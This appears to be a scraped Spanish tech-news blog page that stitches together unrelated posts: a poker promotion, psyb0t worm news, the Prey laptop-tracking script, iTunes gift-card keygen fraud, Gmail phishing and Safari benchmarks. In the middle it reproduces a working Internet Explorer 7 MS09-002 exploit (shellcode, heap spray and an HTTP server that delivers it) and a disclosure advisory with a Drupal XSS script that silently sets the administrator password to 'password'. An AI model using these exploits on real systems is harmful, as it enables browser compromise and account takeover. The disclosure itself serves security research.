kernelpanic.org.mx

Pacificpoker.com es la famosa sala de poker online del grupo 888.com.

Para jugar puedes descargar poker online, configurar el nuevo software de manera gratuita y crear tu propia cuenta. Existe también, la opción de jugar con el programa sin descarga.

Pacificpoker.com ofrece a sus jugadores la posibilidad de jugar poker texas holdem, Omaha Hi/Lo y 7 Card Stud.

El sitio tiene versiones en un gran número de idiomas para hacerlo accesible a todos los jugadores de más de 150 países. Cuenta también con un servicio de atención al cliente las 24 horas, 7 días a la semana.

Además de su sala de poker, 888.com ofrece uno de los mayores casinos online y un sitio de apuestas deportivas.

Un nuevo gusano llamado psyb0t descubierto por la empresa DroneBL, acecha la red, esto no es nada nuevo, todos los días salen gusanos tratando de conseguir la mayor cantidad de víctimas posibles para convertirlos en zombies y realizar las tareas que encargue su creador, pero este gusano tiene una particularidad que lo hace diferente, es capaz de infectar routers, modems y sistemas gnu linux.

Es la primera vez que se observa un ataque exitoso utilizando la infección en este tipo de dispositivos y se calcula que el número de afectados supera los 100.000 equipos y va en aumento, ya que su detección y desinfección son complicadas y “difíciles” de llevar a cabo para un usuario promedio.

El psyb0t se propaga a través de los servicios ssh, telnet y http, explotando vulnerabilidades en ellos o realizando ataques de fuerza bruta ante contraseñas débiles en los usuarios, tan pronto logra acceder al dispositivo descarga un archivo malicioso que permite a su creador administrar remotamente el dispositivo robando información sensible que pasa por el, realizando denegaciones de servicio o cualquier otra tarea que desee realizar su creador, aparte de esto modifica las reglas del firewall para impedir el acceso a el panel de administración del dispositivo.

Si notas un comportamiento extraño en tu red y ya descartaste infecciones de los equipos que la confirman, no olvides revisar la configuración de tu router o modem, si no puedes entrar al panel de control de ellos posiblemente estas infectado con el psyb0t.

Recomendaciones si estas Infectado con el psyb0t

• Resetea La Configuración de tu Dispositivo
• Actualiza tu firmware a la última versión
• Sigue las Instrucciones indicadas por DroneBL

Recomendaciones para evitar ser infectado por el psyb0t

• Mantén al día la versión de tu firmware
• Utiliza contraseñas fuertes.
• Deshabilita los servicios que no utilices en tus dispositivos
• Revisa periódicamente el panel de control de tus aparatos

Para Más Información:
DroneBL
Psyb0t Attacks Linux Routers
Psyb0t, infección en ¡routers!, ¡módems! y ¡Linux!

No hay nada peor para un geek que roben su querido portatil, esto le sucedió a Tomás Pollak, un reconocido blogger y amante del software libre quien tras este lamentable echo se puso en la tarea de crear un script llamado prey, que nos ayuda a rastrea nuestro portatil robado.

Prey es una pequeña y simple aplicación que recolecta gran cantidad de información de tu computador, y la envía a una casilla de correo que hayas definido previamente. La idea es que la instales en tu laptop para que cuando llegue el día — ojalá nunca — en que desaparezca tu portátil, cuentes con más información para rastrearlo, ya sea usando el IP, el nombre de la red WiFi a la que esté conectado, o bien la foto del ladrón.

Prey es un script bash por lo que obviamente el código es abierto, y de hecho está licenciado bajo GPLv3 con un añadido — para que hagas lo que quieras con él. Debería correr en cualquier variante *NIX (Linux, Mac, etc), pero por ahora sólo lo he probado en Ubuntu Intrepid 64 bit y en Mac OS Leopard.

¿Qué información recoge Prey?

Información de red

• La dirección IP pública y privada de donde esté conectado el PC.
• El IP del gateway de la red que está usando para salir a Internet.
• La dirección MAC de la tarjeta o controlador de red por el cual esté conectado a la red.
• El nombre ESSID de la red WiFi a la que esté conectado, en caso que lo esté.
• Un listado de conexiones activas en el momento en que se ejecute el programa.

Información interna del PC

• Cuánto tiempo lleva encendido el aparato.
• Número de usuarios logeados.
• Un listado con los programas en ejecución.
• Un listado con los archivos modificados en la última hora (o el número de minutos que tú definas).

Información del ladrón

• En caso que el PC tenga una webcam, una foto del impostor.
• Un pantallazo del escritorio, para que veas qué está haciendo.
• El color de los calcetines que está usando el tipo.

Bueeeno, esa última por ahora no.

Una vez que el programa hace la recolección te la envía por correo, y adicionalmente, si usas GNU Linux puedes generar un cuadro de diálogo para jugar un poco con el infeliz. Puedes hacerle alguna pregunta, o amenazarlo o simplemente decirle que sus días están contados.

Finalmente puedes botarlo del servidor gráfico para joder con él aún más.

¿Cómo funciona Prey?

El proceso es el siguiente: cada cierto intervalo de tiempo (pongámosle, 10 minutos) el programa se ejecuta y revisa si en la configuración pusiste una URL de checkeo o no. En caso que no lo hayas hecho, o que lo hayas hecho y la URL sí exista, el programa hará el proceso de recolección y envío de datos. Si definiste una URL que no existe, el programa se apagará para volver a ejecutarse en 10 minutos más.

En otras palabras: puedes decirle a Prey que sólo te envíe la información cuando le dés el aviso (creando la URL de verificación que pusiste, después que te hayan robado el computador obviamente), o bien dejar ese campo vacío y que te mande la información cada vez que se ejecute. Si defines una URL, Prey no te enviará nada hasta que pongas algo ahí (lo importante es que tenga algo de texto, puede ser una letra o lo que quieras).

La idea es que tengas la libertad de definir que se ejecute y esté siempre enviando la información, o bien sólo después que te roben el computador (que es lo que yo haría).

Descargar Prey, Script para Rastrear tu Portátil Robado

Para mas Informacion:
Pagina Oficial del Prey

El blog musical Outdustry informa que cientos de tarjetas hackeadas están siendo vendidas en el sitio Taobau, portal chino de subastas.

El propietario del sitio comentó a Outdustry que obtuvieron los códigos mediante “keygens” (generadores de claves) que mediante el algoritmo de Apple logran generar códigos válidos. Agregó que “el trabajo” fue encomendado a hackers externos.

Vendidos vía chat
Las tarjetas de regalo tienen valores de hasta 200 dólares, y las versiones adulteradas son entregadas a los compradores mediante la función de chat de Taobau, y pagado mediante Alipay, sistema similar a Paypal, de gran popularidad en China.

Las alternativas de Apple
Esta situación constituye un gran problema para Apple, que se ve enfrentada a una disyuntiva: cambiar el algoritmo que genera los códigos, y actualizarlo regularmente, o continuar usando el algoritmo actual.

Si la empresa opta por la primera solución deberá retirar de circulación un gran número de tarjetas, que quedarían inutilizadas. Si opta por la segunda alternativa, miles de usuarios piratas tendrían acceso a los contenidos de iTunes mediante códigos adulterados.

Fuente: Outdustry.

ayudemos a mejorar Openoffice.org respondiendo la  encuesta. Hacerlo sólo te tomará 15 minutos y con ello ayudarás a entender mejor sus necesidades y expectativas con respecto al programa Openoffice.org. Al final de la encuesta tendrá la posibilidad de introducir sus comentarios y sugerencias.

¡Muchas gracias!

El equipo de Openoffice.org

Ingresa a la encuensta desde AQUI

Nota sobre la privacidad
Este cuestionario es anónimo.
Los registros que contienen sus respuestas al cuestionario no contienen ninguna identificación suya a menos que una pregunta específicamente así lo haga. Si responde a este cuestionario utilizando una contraseña que le da acceso al cuestionario, puede estar seguro que la misma no se asocia a ninguna de sus respuestas. Ésto se administra en una tabla de datos separada, que sólo se actualiza para indicar que ha completado o no el cuestionario, pero sin establecer vínculo alguno con la tabla donde se almacenan sus respuestas, por lo que no hay manera de asociar una respuesta con la persona que la hizo.

#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   - Based on the code found by str0ke in the wild for MS09-002
#   - Tested using Internet Explorer 7.0.5730.11 on Windows XP SP2
#
#   Usage  : python ie_ms09002.py [port]
#

import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class RequestHandler(BaseHTTPRequestHandler):

    def get_payload(self):
        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
        # http://metasploit.com
        payload  = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f'
        payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b'
        payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47'
        payload += '\xe4\x36\x3a\x0f\x81\x33\x71\x97\xc3\x86\x71\x7a\x68\xc3\x7b\x03'
        payload += '\x6e\xc0\x5a\xfa\x54\x56\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68'
        payload += '\xe4\x0e\xfa\x85\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a'
        payload += '\x6b\xc1\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
        payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02\x3a\x66'
        payload += '\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e\x07\x7c\x69\xec'
        payload += '\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61\xd0\x62\x0c\x2c\xd4\x76'
        payload += '\x0a\x02\xb1\x0e';
        return self.convert_to_utf16(payload)

    def get_exploit(self):
        exploit = '''

        function spray_heap()
        {
            var payload = unescape("<PAYLOAD>");

            var ret = 0x0c0c0c0c;
            var heap_chunk_size = 0x40000;

            var nopsled_size = heap_chunk_size - (payload.length * 2)
            var nopsled = unescape("%u0c0c%u0c0c");
            while (nopsled.length < nopsled_size)
                nopsled += nopsled;

            heap_chunks = new Array();
            heap_chunks_num = (ret - heap_chunk_size)/heap_chunk_size;
            for (var i = 0 ; i < heap_chunks_num ; i++)
                heap_chunks[i] = nopsled + payload;
        }

        function trigger_bug()
        {
            var obj = document.createElement("table");
            obj.click;

            var obj_cp = obj.cloneNode();
            obj.clearAttributes();
            obj = null;

            CollectGarbage();

            var img = document.createElement("img");
            img.src = unescape("%u0c0c%u0c0cCCCCCCCCCCCCCCCCCCCCCC");

	        obj_cp.click;
        }

        if (navigator.userAgent.indexOf("MSIE 7") != -1) {
            spray_heap();
            trigger_bug()
        } else
            window.location = "about:blank"

        '''
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
        exploit = '<html><body><script>' + exploit + '</script></body></html>'
        return exploit

    def convert_to_utf16(self, payload):
        # From Beta v2.0 by Berend-Jan Wever
        # http://www.milw0rm.com/exploits/656
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                num += (ord(payload[i+j]) & 0xff) << (j*8)
            enc_payload += '%%u%04x' % num
        return enc_payload

    def log_request(self, *args, **kwargs):
        pass

    def do_GET(self):
        print '[-] Incoming connection from %s' % self.client_address[0]
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        print '[-] Sending exploit to %s ...' % self.client_address[0],
        self.wfile.write(self.get_exploit())
        print 'done'

def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port]' % sys.argv[0]
        sys.exit(1)
    port = None
    try:
        port = int(sys.argv[1])
        if port < 1 or port > 65535:
            raise ValueError
    except ValueError:
        print '[*] ERROR: invalid port number ...'
        sys.exit(-1)
    try:
        serv = HTTPServer(('', port), RequestHandler)
        ip = socket.gethostbyname(socket.gethostname())
        print '[-] Web server is running at http://%s:%d/' % (ip, port)
    except socket.error:
        print '[*] ERROR: a socket error has occurred ...'
        sys.exit(-1)
    try:
        serv.serve_forever()
    except KeyboardInterrupt:
        print '[-] Exiting ...'

if __name__ == '__main__':
    main()

# milw0rm.com [2009-03-04]

Small write up regarding a cross site scripting vulnerability on Drupal version 5.15 being used for a password change attack. Attack script included.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Problem Description:

There have been quite a few Cross Site Scripting (XSS) vulnerabilities
discovered in Drupal modules recently.  Many people scoff at XSS and
even argue that it's a low threat vulnerability.  In many cases this is
certainly true, however XSS can be used as an element in an attack that
leverages other security weaknesses to devastating consequence.  A case
in point is the password changing option in Drupal.  Drupal does a
wonderful job in preventing against Cross Site Request Forgery (XSRF or
CSRF) by placing tokens in forms to validate posts.  Drupal provides a
token in the id "edit-user-edit-form-token" in the edit user form (found
at ?a=user/X/edit where X is the user id number).  A sample value
contained in this hidden form field is
"5545a410de3662f1844af7ee6f1ee770" - a value sufficiently long and
random that an attacker would have great difficulty in guessing the
value.  However, the Drupal account page doesn't require users to enter
the current account password in order to change the password to a new
value.  This flaw, combined with a well crafted XSS attack, could be
used to change a user's password to an arbitrary value.  What's worse,
Drupal uses session cookies by default that can keep users logged into
the site for days.  This means that a user could be the victim of a
password changing attack and not even realize their password had been
changed for some time (until their session cookie timed out or they
logged out of the site) when they were forced to log back in to the
site.  The user would still be able to request a password reset via
e-mail, so they would not be locked out of the site, but they might have
their account hijacked for some time in the interim.

Exploiting the Flaw:

To accomplish a malicious password change via XSS is quite easy.  The
technique can use an invisible iframe that loads the account editing
page.  This is similar to a cross site request forgery, except that by
embedding the iframe in the target site the request does not even have
to cross domains.  The iframe loads the target page, which includes the
Drupal generated token.  The malicious script can then fill in a new
password and submit the form, invisibly to the user.

I have provided an example of such a script below.  Note that this
script is enhanced in that it will only change the user's password if
the user has a user id of 1, or is the administrative super user.  I've
also left out the logic to alert a remote attacker of a successful
compromise, but this is a simple feature to add.  Once added to any
page, this script will silently assess the user id of any logged in
Drupal user who requests the page.  If the user is the site admin then
their password will be reset to "password" silently, without their
knowledge.

Why the Attack Works:

This attack is possible because Drupal does not require
re-authentication in order to perform a password reset.  Because the
malicious JavaScript writer doesn't have to provide an unknown password,
there is no barrier to the update.  In order to prevent against this
sort of attack Drupal would have to add another field in the password
changing (user edit) screen where users were required to enter their
existing password.

Using the Attack:

The JavaScript snippet below could be injected in any number of ways
into a site.  In fact, many Drupal sites are configured so any content
creator can use the "Full HTML" input format, which is all that is
required to insert JavaScript into Drupal site content.  Any users with
this ability or attackers who compromised such an account, would be able
to attack and compromise the Drupal super user account using this method.

Notes:

Note that in the script below the Drupal site is running at 192.168.0.2
and the URL settings are such that the admin user edit screen is
available at http://192.168.0.2/?q=user/1/edit.  Note that this script
could be altered to update the password of any Drupal user account, not
necessarily just the administrator as it checks the "My account" link
URL to determine the user id of the logged in user viewing the malicious
Drupal content.

This script was tested against Drupal 5.15 on Mozilla Firefox.  Some
modification may be necessary for other versions of Drupal, although
Drupal 6 seems vulnerable as well.  Other browsers may require separate
JavaScript syntax to carry out this attack.

Attack Script:

<script>
function alterUser() {
  var text = document.documentElement.innerHTML;
  var myAccountText = text.indexOf('My account');
  var i = myAccountText-2;
  while (! text.charAt(i).match(/[0-9]/g)) {
    i--;
  }
  myAccountNumber = text.substring(i, myAccountText-2);
  if (myAccountNumber == 1) {
    /*alert(myAccountNumber );*/
    var url = "http://192.168.0.2/?q=user/" + myAccountNumber + "/edit";
    document.write('<iframe id="foo" name="foo" width="1" height="1" >');
    document.write('</iframe>');
    window.frames['foo'].location = url;
    /* Slow it down, let the load happen */
    setTimeout('doNext()', 4000);
   }
}
function doNext() {
    var theDoc = document.getElementById('foo');
    foo.document.getElementById('edit-pass-pass1').value = 'password';
    foo.document.getElementById('edit-pass-pass2').value = 'password';
    foo.document.getElementById('user-edit').submit();
    /* Admin pass changed - TODO: alert evil overlords */
}
alterUser();
</script>

Follow Up:

The Drupal security team has been notified about this issue.  It seems a
mitigation feature may be built into Drupal 7
(http://drupal.org/node/86299, http://drupal.org/node/138805) and a
verify password on change patch does exist (http://drupal.org/node/86711).

The text of this advisory is also available at

http://lampsecurity.org/drupal-xss-password-reset

- --
Justin C. Klein Keane

http://www.MadIrish.net

http://www.LAMPSecurity.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQD1AwUBSbBC65EpbGy7DdYAAQJDCAcArCksNxWe1Wu0xGR/fK2xzAxStfqZnfkg
3r4SrvlFFT2YOJrlAeSFI7ALNKHCyluW8iKPbYEHDTD9KsbdhNC6ZJ10xiKP9D3X
2xh9AibJuj7CTOacVXJfyNcYxngsArzmnUo44qZOl+dch7JG1adSD2fVntcDh1F4
+W3qH+QE8Q5OzdVrachzdAZytv9LLHv907xfSWo40IERFpt6Xr1HmM16Y7XYuwcA
rbEvWGmNgkPUMrcQ2mfIN2/vRnReeJ/693sfhnEd8nXUPUbPO3EcFTakx+Tfq98n
/G+wfW+MJYQ=
=IMPE
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

El pasado martes, durante cerca de cuatro horas, el servicio de correo electrónico de Google, Gmail, dejó de funcionar. Pese a no haber hecho público el número de personas a las que afectó este apagón, la compañía si ha explicado las causas de la caída de su página de correo electrónico.

Así, la empresa de Internet ha notificado a través de un comunicado que el problema comenzó durante un servicio de mantenimiento rutinario de un centro de datos europeo, lo que coincidió con la introducción de un nuevo código para dar más proximidad al servicio. El fallo de un servidor provocó la sobrecarga de otro centro de datos, lo que llevó a un efecto cascada que terminó afectando a diversos centros.

Aunque con este comunicado, Google desmiente que la caída del servicio se haya debido a un ataque externo, lo cierto es que, recientemente, la seguridad de su sistema de correo ha quedado en entredicho tras descubrirse una amenaza de phishing contra el sistema de mensajería instantánea de Gmail.

A este respecto, Sophos advierte a los usuarios de Gmail de estar alerta sobre estos ataques de phishing, tras la noticia de que el sistema de correo electrónico de Google ha sido objeto de una campaña de robo de identidad, ataque que se extendió a través de su sistema de mensajería instantánea (Google Talk).

Los ejemplos analizados por el laboratorio de Sophos revelan la aparición de mensajes instantáneos no solicitados en la pantalla de los usuarios, que con el anuncio: “check out this video” (comprueba este vídeo), instan a éstos a pinchar sobre un link vía el servicio de TinyURL. El enlace, sin embargo, redirecciona a los usuarios a un sitio web denominado WiddyHo, donde se les requiere su nombre de usuario de Gmail y su contraseña. En este sentido, los expertos de Sophos advierten que los hackers que están detrás de WiddyHo podrían utilizar la información sustraída para entrar en las cuentas personales, hacerse con datos claves y, en definitiva, cometer robo de identidad.

“Todos recibimos información sospechosa a través del correo electrónico. Sin embargo, en esta ocasión, estos ataques han sido realizados a través del sistema de mensajería instantánea de Gmail, lo que entraña que muchos usuarios, que se creen seguros, puedan caer en la trampa sin ser conscientes de ello”, afirma Graham Cluley, consultor de tecnología de Sophos.

Aunque TinyURL ya ha puesto el sitio en la lista negra -lo que quiere decir que el link no funcionará-, esta acción no frenará la habilidad de los hackers que utilizarán otros sitios de rediccionamiento URL o prepararán alojamientos alternativos de phishing para intentar robar a los incautos.

fuente: diarioTI

Cuando Apple presentó su nueva versión del navegador Safari, asegurando que era hasta 30 veces más rápido que Internet Explorer para la ejecución de JavaScript, hubo un gran número de interesados en confirmar o desmentir la información. Esta vez, Apple parece haber faltado a la verdad en un sentido positivo. En efecto, ensayos prácticos realizados por Cnet demuestran que la nueva Nitro Engine, que ejecuta código JavaScript en Safari 4, puede alcanzar velocidades hasta 42 veces superiores a Internet Explorer 7.

Aparte de ello, el nuevo Safari 4 Public Beta ha obtenido una puntuación de 100/100 en la prueba Acid3, en tanto que Internet Explorer 7 sólo consigue 14/100.

Fuente: CNet.